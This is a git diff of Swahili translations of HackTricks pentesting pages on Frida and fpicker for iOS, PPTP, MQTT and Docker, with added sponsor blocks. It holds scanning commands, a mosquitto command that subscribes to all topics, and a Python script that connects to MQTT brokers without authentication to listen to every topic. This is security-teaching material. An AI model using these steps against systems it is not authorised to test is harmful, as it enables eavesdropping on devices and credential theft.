* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
## Kusakinisha Frida
**Hatua za kusakinisha Frida kwenye kifaa kilichofunguliwa kwa Jailbreak:**
@ -21,10 +35,10 @@ Njia nyingine za kusaidia HackTricks:
1. Fungua programu ya Cydia/Sileo.
2. Nenda kwa Usimamizi -> Vyanzo -> Hariri -> Ongeza.
3. Ingiza "https://build.frida.re" kama URL.
4. Nenda kwenye chanzo kipya cha Frida kilichoongezwa.
4. Nenda kwenye chanzo cha Frida kilichoongezwa hivi karibuni.
5. Sakinisha pakiti ya Frida.
Ikiwa unatumia **Corellium** utahitaji kupakua kutoleo la Frida kutoka [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) (`frida-gadget-[yourversion]-ios-universal.dylib.gz`) na kufungua na kunakili kwenye eneo la dylib ambalo Frida inahitaji, k.m.: `/Users/[youruser]/.cache/frida/gadget-ios.dylib`
Ikiwa unatumia **Corellium** utahitaji kupakua kutolewa kwa Frida kutoka [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) (`frida-gadget-[yourversion]-ios-universal.dylib.gz`) na kufungua na kunakili kwenye eneo la dylib ambalo Frida inahitaji, k.m.: `/Users/[youruser]/.cache/frida/gadget-ios.dylib`
Baada ya kusakinishwa, unaweza kutumia amri **`frida-ls-devices`** kwenye PC yako na kuhakikisha kuwa kifaa kinaonekana (PC yako inahitaji kuweza kufikia).\
Tumia pia **`frida-ps -Uia`** kuchunguza michakato inayoendeshwa kwenye simu.
@ -63,13 +77,13 @@ frida-trace -U <program> -m "*[NE* *authentication*]"
## To hook a plugin that is momentarely executed prepare Frida indicating the ID of the Plugin binary
frida-trace -U -W <if-plugin-bin> -m '*[* *]'
```
### Pata darasa zote na njia
### Pata madarasa yote na njia
* Kukamilisha moja kwa moja: Tekeleza tu `frida -U <programu>`
* Kukamilisha moja kwa moja: Tekeleza `frida -U <program>`
<figure><img src="../../.gitbook/assets/image (1156).png" alt=""><figcaption></figcaption></figure>
* Pata **darasa zote** zilizopo (panga kwa kutumia string)
* Pata **madarasa** yote yanayopatikana (pambanua kwa herufi)
{% code title="/tmp/script.js" %}
```javascript
@ -91,9 +105,7 @@ console.log("Objective-C runtime is not available.");
```
{% endcode %}
* Pata **njia zote** za **darasa** (panga kwa kamba)
{% code title="/tmp/script.js" %}
* Pata **njia zote** za **darasa** (panga kwa kutumia herufi)
```javascript
// frida -U <program> -l /tmp/script.js
@ -157,7 +169,7 @@ console.log("loaded");
Unayo mfano unaoendeleza Frida Stalker katika [https://github.com/poxyran/misc/blob/master/frida-stalker-example.py](https://github.com/poxyran/misc/blob/master/frida-stalker-example.py)
Huu ni mfano mwingine wa kuambatisha Frida Stalker kila wakati kazi inaitwa:
Hii ni mfano mwingine wa kuambatisha Frida Stalker kila wakati kazi inaitwa:
```javascript
console.log("loading");
const wg_log_addr = Module.findExportByName("<Program>", "<function_name>");
@ -191,12 +203,12 @@ Stalker.flush(); // this is important to get all events
});
```
{% hint style="danger" %}
Hii ni ya kuvutia kwa madhumuni ya kutatua matatizo lakini kwa fuzzing, kuwa mara kwa mara **`.follow()`** na **`.unfollow()`** ni ya ufanisi sana.
Hii ni ya kuvutia kwa madhumuni ya kutatua matatizo lakini kwa fuzzing, kuwa kila wakati **`.follow()`** na **`.unfollow()`** ni ya ufanisi sana.
{% endhint %}
## [Fpicker](https://github.com/ttdennis/fpicker)
[**fpicker**](https://github.com/ttdennis/fpicker) ni **zana ya kufanya fuzzing kwa kutumia Frida** ambayo inatoa aina mbalimbali za modes za fuzzing kwa fuzzing ndani ya mchakato, kama vile mode ya AFL++ au mode ya kufuatilia kwa upande. Inapaswa kuendesha kwenye majukwaa yote yanayoungwa mkono na Frida.
[**fpicker**](https://github.com/ttdennis/fpicker) ni **zana ya kufanya fuzzing kwa kutumia Frida** ambayo inatoa aina mbalimbali za modes za fuzzing kwa fuzzing ndani ya mchakato, kama vile mode ya AFL++ au mode ya kufuatilia pasifiki. Inapaswa kuendesha kwenye majukwaa yote yanayoungwa mkono na Frida.
* [**Sakinisha fpicker**](https://github.com/ttdennis/fpicker#requirements-and-installation) **& radamsa**
```bash
@ -217,7 +229,7 @@ make fpicker-[yourOS] # fpicker-macos
# Install radamsa (fuzzer generator)
brew install radamsa
```
* **Jitayarisha FS:**
* **Jipange kwa FS:**
```bash
# From inside fpicker clone
mkdir -p examples/wg-log # Where the fuzzing script will be
@ -298,7 +310,7 @@ rpc.exports.fuzzer = f;
## Compile from "myfuzzer.js" to "harness.js"
frida-compile examples/wg-log/myfuzzer.js -o harness.js
```
* Piga fuzzer **`fpicker`** ukitumia **`radamsa`**:
* Piga fuzzer **`fpicker`** kutumia **`radamsa`**:
{% code overflow="wrap" %}
```bash
@ -309,7 +321,7 @@ fpicker -v --fuzzer-mode active -e attach -p <Program to fuzz> -D usb -o example
{% endcode %}
{% hint style="danger" %}
Katika kesi hii **hatuendi kuanza upya programu au kurejesha hali** baada ya kila mzigo. Kwa hivyo, ikiwa Frida inapata **kosa**, **vipimo vya baadaye** baada ya mzigo huo pia inaweza **kusababisha programu kugonga** (kwa sababu programu iko katika hali isiyo thabiti) hata ikiwa **kuingia haipaswi kusababisha** programu kugonga.
Katika kesi hii **hatuendi kuanza upya programu au kurejesha hali** baada ya kila mzigo. Kwa hivyo, ikiwa Frida inapata **kosa**, **matokeo ya kuingiza** baada ya mzigo huo pia yanaweza **kusababisha programu kugonga** (kwa sababu programu iko katika hali isiyo thabiti) hata kama **kuingiza haipaswi kusababisha** programu kugonga.
Zaidi ya hayo, Frida itaunganisha ishara za kipekee za iOS, kwa hivyo wakati **Frida inapata kosa**, labda **ripoti za kugonga za iOS hazitazalishwa**.
@ -320,7 +332,7 @@ Ili kuzuia hili, kwa mfano, tunaweza kuanza upya programu baada ya kila kugonga
Unaweza kuangalia **konsoli ya macOS** au **cli ya `log`** kuangalia kumbukumbu za macOS.\
Unaweza pia kuangalia kumbukumbu kutoka iOS kwa kutumia **`idevicesyslog`**.\
Baadhi ya kumbukumbu zitakosa taarifa kwa kuongeza **`<binafsi>`**. Ili kuonyesha taarifa zote unahitaji kusakinisha wasifu fulani kutoka [https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/) kuwezesha taarifa hizo za binafsi.
Baadhi ya kumbukumbu zitakosa taarifa kwa kuongeza **`<binafsi>`**. Ili kuonyesha taarifa zote unahitaji kusakinisha wasifu fulani kutoka [https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/) kuwezesha taarifa hizo za kibinafsi.
Ikiwa hujui cha kufanya:
```sh
@ -359,9 +371,23 @@ iOS inahifadhi ajali 25 za programu ile ile tu, hivyo unahitaji kusafisha hiyo a
* [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa utendaji wa **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
@ -369,6 +395,6 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -1,34 +1,4 @@
# 1723 - Pentesting PPTP
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
## Taarifa Msingi
**Point-to-Point Tunneling Protocol (PPTP)** ni njia inayotumiwa sana kwa **upatikanaji wa kijijini** kwa vifaa vya simu. Inatumia **bandari ya TCP 1723** kwa kubadilishana funguo, wakati **itifaki ya IP 47** (Generic Routing Encapsulation, au **GRE**), inatumika kusimbua data inayotumwa kati ya wenzake. Hii ni muhimu kwa kuanzisha njia salama ya mawasiliano juu ya mtandao, ikihakikisha kuwa data inayobadilishwa inabaki kuwa ya siri na inalindwa dhidi ya ufikiaji usioidhinishwa.
**Bandari ya Default**: 1723
## Uchunguzi
```bash
nmap Pn -sSV -p1723 <IP>
```
### [Brute Force](../generic-methodologies-and-resources/brute-force.md#pptp)
## Vulnerabilities
* [https://www.schneier.com/academic/pptp/](https://www.schneier.com/academic/pptp/)
* [https://github.com/moxie0/chapcrack](https://github.com/moxie0/chapcrack)
# 1723 - Kupima Usalama wa PPTP
<details>
@ -36,10 +6,54 @@ nmap Pn -sSV -p1723 <IP>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wamedukuliwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
## Taarifa Msingi
**Itifaki ya Point-to-Point Tunneling Protocol (PPTP)** ni njia inayotumiwa sana kwa ajili ya **upatikanaji wa mbali** kwenye vifaa vya simu. Inatumia **bandari ya TCP 1723** kwa kubadilishana funguo, wakati **itifaki ya IP 47** (Generic Routing Encapsulation, au **GRE**), hutumika kusimbua data inayotumwa kati ya wenzao. Hii ni muhimu kwa kuanzisha njia salama ya mawasiliano kupitia mtandao, ikihakikisha kuwa data inayobadilishwa inabaki kuwa ya siri na kulindwa dhidi ya ufikiaji usioidhinishwa.
**Bandari ya Msingi**: 1723
## Uorodheshaji
```bash
nmap Pn -sSV -p1723 <IP>
```
### [Kujaribu Kuvunja](../generic-methodologies-and-resources/brute-force.md#pptp)
## Mapungufu
* [https://www.schneier.com/academic/pptp/](https://www.schneier.com/academic/pptp/)
* [https://github.com/moxie0/chapcrack](https://github.com/moxie0/chapcrack)
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -2,21 +2,35 @@
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
## Taarifa Msingi
**MQ Telemetry Transport (MQTT)** inajulikana kama **itifaki ya ujumbe wa kuchapisha/kusikiliza** ambayo inajulikana kwa unyenyekevu wake wa kipekee na uzito wake mdogo. Itifaki hii imeundwa mahsusi kwa mazingira ambapo vifaa vina uwezo mdogo na vinatumika kwenye mitandao ambayo inajulikana kwa upungufu wa wigo wa bandari, kuchelewa kwa juu, au uhusiano usioaminika. Malengo makuu ya MQTT ni pamoja na kupunguza matumizi ya wigo wa mtandao na kupunguza mahitaji kwenye rasilimali za kifaa. Aidha, inalenga kudumisha mawasiliano yanayoweza kutegemewa na kutoa kiwango fulani cha uhakikisho wa utoaji. Malengo haya hufanya MQTT iweze kufaa sana kwa uwanja unaokua wa **mawasiliano ya mashine-kwa-mashine (M2M)** na **Intaneti ya Vitu (IoT)**, ambapo ni muhimu kuunganisha vifaa vingi kwa ufanisi. Zaidi ya hayo, MQTT ni muhimu sana kwa programu za simu, ambapo kuhifadhi wigo na maisha ya betri ni muhimu.
**MQ Telemetry Transport (MQTT)** inajulikana kama **itifaki ya ujumbe wa kuchapisha/kusikiliza** ambayo inajulikana kwa unyenyekevu na uzito wake. Itifaki hii imeundwa mahsusi kwa mazingira ambapo vifaa vina uwezo mdogo na vinatumika kwenye mitandao ambayo inajulikana kwa upungufu wa wigo wa bandari, kuchelewa kwa juu, au uhusiano usioaminika. Malengo makuu ya MQTT ni pamoja na kupunguza matumizi ya wigo wa mtandao na kupunguza mahitaji kwenye rasilimali za kifaa. Aidha, inalenga kudumisha mawasiliano yanayoweza kutegemewa na kutoa kiwango fulani cha uhakikisho wa utoaji. Malengo haya hufanya MQTT iweze kufaa sana kwa uga unaoongezeka wa **mawasiliano ya mashine-kwa-mashine (M2M)** na **Intaneti ya Vitu (IoT)**, ambapo ni muhimu kuunganisha vifaa vingi kwa ufanisi. Zaidi ya hayo, MQTT ni muhimu sana kwa programu za simu, ambapo kuhifadhi wigo wa bandari na maisha ya betri ni muhimu.
**Bandari ya msingi:** 1883
```
@ -25,9 +39,9 @@ PORT STATE SERVICE REASON
```
## Kuchunguza trafiki
Wakati pakiti ya **CONNECT** inapopokelewa na wakala wa MQTT, pakiti ya **CONNACK** hutumwa kujibu. Pakiti hii ina msimbo wa kurudi ambao ni muhimu kwa kuelewa hali ya uhusiano. Msimbo wa kurudi wa **0x00** una maana kuwa anwani za siri zimekubaliwa, ikionyesha uhusiano uliofanikiwa. Kwa upande mwingine, msimbo wa kurudi wa **0x05** unamaanisha kuwa anwani za siri si sahihi, hivyo kuzuia uhusiano.
Wakati pakiti ya **CONNECT** inapopokelewa na wakala wa MQTT, pakiti ya **CONNACK** hutumwa kujibu. Pakiti hii ina msimbo wa kurudi ambao ni muhimu kwa kuelewa hali ya uunganisho. Msimbo wa kurudi wa **0x00** una maana kuwa anwani za siri zimekubaliwa, ikionyesha uunganisho uliofanikiwa. Kwa upande mwingine, msimbo wa kurudi wa **0x05** unamaanisha kuwa anwani za siri ni batili, hivyo kuzuia uunganisho.
Kwa mfano, ikiwa wakala anakataa uhusiano kutokana na anwani za siri zisizo sahihi, hali ingeonekana kama hii:
Kwa mfano, ikiwa wakala atakataa uunganisho kutokana na anwani za siri batili, hali itaonekana kama ifuatavyo:
```
{
"returnCode": "0x05",
@ -36,11 +50,11 @@ Kwa mfano, ikiwa wakala anakataa uhusiano kutokana na anwani za siri zisizo sahi
```
![](<../.gitbook/assets/image (973).png>)
### [**Kuvunja Nguvu MQTT**](../generic-methodologies-and-resources/brute-force.md#mqtt)
### [**Kuforce MQTT**](../generic-methodologies-and-resources/brute-force.md#mqtt)
## Pentesting MQTT
**Uthibitishaji ni hiari kabisa** na hata kama uthibitishaji unafanywa, **encryption haiitwi kwa chaguo-msingi** (vitambulisho hutolewa kwa maandishi wazi). Mashambulizi ya MITM bado yanaweza kutekelezwa kuiba nywila.
**Uthibitisho ni hiari kabisa** na hata kama uthibitisho unafanywa, **encryption haiitumiwi kwa chaguo-msingi** (mikopo hutumwa kwa maandishi wazi). Mashambulizi ya MITM bado yanaweza kutekelezwa kuiba nywila.
Kuunganisha kwenye huduma ya MQTT unaweza kutumia: [https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell) na kujisajili kwenye mada zote kwa kufanya:
```
@ -56,7 +70,7 @@ apt-get install mosquitto mosquitto-clients
mosquitto_sub -t 'test/topic' -v #Subscribe to 'test/topic'
mosquitto_sub -h <host-ip> -t "#" -v #Subscribe to ALL topics.
```
Au unaweza **kutekeleza nambari hii ili kujaribu kuunganisha kwenye huduma ya MQTT bila uthibitishaji, kusajili kila mada na kuzisikiliza**:
Au unaweza **kutekeleza nambari hii ili kujaribu kuunganisha kwenye huduma ya MQTT bila uthibitisho, kusajili kila mada na kuzisikiliza**:
```python
#This is a modified version of https://github.com/Warflop/IOT-MQTT-Exploit/blob/master/mqtt.py
import paho.mqtt.client as mqtt
@ -93,9 +107,9 @@ kutoka hapa: [https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b](ht
Mfano wa kuchapisha/kusikiliza unajumuisha:
* **Mchapishaji**: huchapisha ujumbe kwa mada moja (au nyingi) kwenye mpatanishi.
* **Msikilizaji**: anasikiliza mada moja (au nyingi) kwenye mpatanishi na kupokea ujumbe wote uliotumwa na mchapishaji.
* **Mpatanishi**: huarifu ujumbe wote kutoka kwa wachapishaji kwenda kwa wasikilizaji.
* **Mchapishaji**: huchapisha ujumbe kwa moja (au zaidi) ya mada katika mpatanishi.
* **Msikilizaji**: anajiandikisha kwa moja (au zaidi) ya mada katika mpatanishi na kupokea ujumbe wote uliotumwa na mchapishaji.
* **Mpatanishi**: huarifu ujumbe wote kutoka kwa wachapishaji kwa wasikilizaji.
* **Mada**: inajumuisha kiwango kimoja au zaidi kilichotenganishwa na mstari wa mbele (k.m., /smartshouse/livingroom/temperature).
### Muundo wa Pakiti <a href="#f15a" id="f15a"></a>
@ -107,17 +121,17 @@ Kila pakiti ya MQTT ina kichwa kilichofungwa (Mchoro 02).Mchoro 02: Kichwa Kilic
### Aina za Pakiti
* CONNECT (1): Kuanzishwa na mteja kuomba uhusiano kwa seva.
* CONNACK (2): Kuthibitisha seva ya uhusiano uliofanikiwa.
* CONNACK (2): Kuthibitishwa kwa seva kwa uhusiano uliofanikiwa.
* PUBLISH (3): Hutumiwa kutuma ujumbe kutoka kwa mteja kwenda kwa seva au kinyume chake.
* PUBACK (4): Kuthibitisha pakiti ya PUBLISH.
* PUBREC (5): Sehemu ya itifaki ya utoaji ujumbe ikidhibitisha ujumbe umepokelewa.
* PUBREC (5): Sehemu ya itifaki ya utoaji ujumbe ikihakikisha ujumbe unapokelewa.
* PUBREL (6): Hakikisho zaidi katika utoaji wa ujumbe, ikionyesha kutolewa kwa ujumbe.
* PUBCOMP (7): Sehemu ya mwisho ya itifaki ya utoaji ujumbe, ikionyesha kukamilika.
* SUBSCRIBE (8): Ombi la mteja kusikiliza ujumbe kutoka kwa mada.
* SUBACK (9): Kuthibitisha ya seva ya ombi la SUBSCRIBE.
* SUBACK (9): Kuthibitishwa kwa seva ya ombi la SUBSCRIBE.
* UNSUBSCRIBE (10): Ombi la mteja kuacha kupokea ujumbe kutoka kwa mada.
* UNSUBACK (11): Majibu ya seva kwa ombi la UNSUBSCRIBE.
* PINGREQ (12): Ujumbe wa moyo unatumwa na mteja.
* PINGREQ (12): Ujumbe wa moyo wa kupelekwa na mteja.
* PINGRESP (13): Majibu ya seva kwa ujumbe wa moyo.
* DISCONNECT (14): Kuanzishwa na mteja kumaliza uhusiano.
* Thamani mbili, 0 na 15, zimewekwa kama zilizohifadhiwa na matumizi yao ni marufuku.
@ -126,6 +140,18 @@ Kila pakiti ya MQTT ina kichwa kilichofungwa (Mchoro 02).Mchoro 02: Kichwa Kilic
* `port:1883 MQTT`
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa utendaji wa **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** hapa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

View file

@ -1,32 +1,46 @@
# 2375, 2376 Kupima Docker
# 2375, 2376 Kupima Usalama wa Docker
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
